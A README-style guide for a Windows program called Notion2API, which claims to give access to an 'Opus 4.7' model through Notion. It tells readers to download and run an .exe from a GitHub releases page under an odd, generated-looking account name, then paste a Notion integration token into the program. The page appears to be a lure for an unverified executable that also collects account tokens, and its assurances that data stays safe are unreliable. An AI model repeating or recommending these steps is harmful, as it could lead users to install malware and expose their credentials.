This application acts as a bridge between your computer and the Notion platform. It creates a connection that allows you to use the Opus 4.7 model. You do not need developer skills or complex setups to use this tool. This guide walks you through the steps to get the software running on your Windows computer.
Your computer must meet these basic standards to run the application correctly:
- Microsoft Windows 10 or Windows 11.
- An active internet connection.
- A valid Notion account.
- At least 200MB of free disk space.
- Four gigabytes of system memory.
Follow these steps to obtain the correct files for your system:
- Visit the official release page: https://github.com/tureenheteroploid536/Notion2API-Tutorial/releases.
- Look for the section labeled "Assets" at the bottom of the latest release.
- Click the link ending in .exe to start the file download.
- Save the file to a folder you recognize, such as your Downloads folder.
- Double-click the downloaded file to begin the setup process.
- Follow the instructions on the screen to finish the installation.
Once the installation finishes, you need to configure the program to connect to your Notion account.
- Open the Notion2API application from your desktop or Start menu.
- The application opens a window. Look for the input field marked "API Key."
- Log in to your Notion account in a web browser.
- Navigate to your settings page and generate an integration token.
- Copy this token and paste it into the input field in the application window.
- Save your settings. The application checks the connection automatically.
The application interface prioritizes ease of use. You see four main areas:
- Status Indicators: These show if the connection to the Opus 4.7 model is active or idle. Green means the connection works. Red means you need to check your settings.
- Request Logs: This area shows the history of your interactions. It helps you see if a request failed.
- Model Settings: Use this to choose the version of the Opus model you wish to target.
- Configuration Menu: Click this to update your account tokens or change your network settings.
This software keeps your data safe. It does not store your Notion account password on your local hard drive. It only saves the integration token. You remain in control of your data. You can disconnect the application from your Notion account at any time through the Notion settings menu under "Integrations."
Does this software work on Mac? This version is designed specifically for Microsoft Windows. It does not support macOS or Linux at this time.
What happens if I lose my internet connection? The application stops sending requests. It resumes once your internet connection returns. You do not need to restart the application in most cases.
Can I use multiple Notion accounts? You can only use one account at a time. To switch accounts, open the settings menu and update the integration token with the token from your other account.
How do I update the application? When a new version exists, the application notifies you during startup. You can then download the latest version from the link provided in the installation section above. The installer replaces the old files while keeping your settings intact.
The application shows an error message. What do I do? Check your internet connection first. If the problem persists, restart your computer. If the error continues, check that your integration token is valid in the Notion dashboard. Most errors occur when the token expires or when the permissions inside Notion change.
- Keep the application window open while you work if you require frequent responses.
- Close the application when you finish your work to free up system memory.
- Check for updates once a month to ensure you have the latest performance improvements.
- If you find that the model is slow, check your background applications to ensure they do not consume all your bandwidth.
